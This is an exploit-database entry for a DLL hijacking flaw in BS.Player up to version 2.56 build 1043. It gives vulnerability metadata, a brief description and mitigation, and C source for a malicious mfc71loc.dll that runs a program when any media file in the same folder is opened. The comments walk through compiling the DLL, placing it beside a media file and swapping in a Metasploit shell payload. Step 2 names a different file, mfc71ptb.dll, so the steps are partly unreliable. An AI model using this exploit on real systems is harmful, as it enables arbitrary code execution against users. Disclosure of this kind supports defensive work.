BS.Player DLL Hijacking Exploit (mfc71loc.dll)

vendor:

BS.Player

by:

Bruno Filipe

7,8

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: BS.Player

Affected Version From: <= 2.56 build 1043

Affected Version To: <= 2.56 build 1043

Patch Exists: NO

Related CWE: N/A

CPE: a:bsplayer:bs.player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WinXP SP2, WinXP SP3

2010

BS.Player DLL Hijacking Exploit (mfc71loc.dll)

This exploit allows an attacker to execute arbitrary code on a vulnerable system by hijacking a DLL file associated with BS.Player. The attacker can create a malicious DLL file and place it in the same directory as a media file handled by BS.Player. When the media file is opened, the malicious DLL will be executed.

Mitigation:

Ensure that all DLL files are from trusted sources and are digitally signed.

Source

Exploit-DB raw data:

/*
# Exploit Title: BS.Player DLL Hijacking Exploit (mfc71loc.dll)
# Date: 25/08/2010
# Author: Bruno Filipe (diwr) http://digitalacropolis.us
# Software Link: http://www.bsplayer.org
# Version: <= 2.56 build 1043
# Tested on: WinXP SP2, WinXP SP3
# Thx TheLeader ;)
#
----------------------------------------------------------------------------------------------------------
# This should work with any file handled by BS.Player (videos and music)
# 1. gcc dllmain.c -o mfc71loc.dll
# 2. Put mfc71ptb.dll in the same directory of a media file (EG:
anything.avi)
# 3. You can generate a msfpayload DLL and spawn a shell, for example.
#
----------------------------------------------------------------------------------------------------------
*/


#include <windows.h>

int main()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  main();
  return 0;
}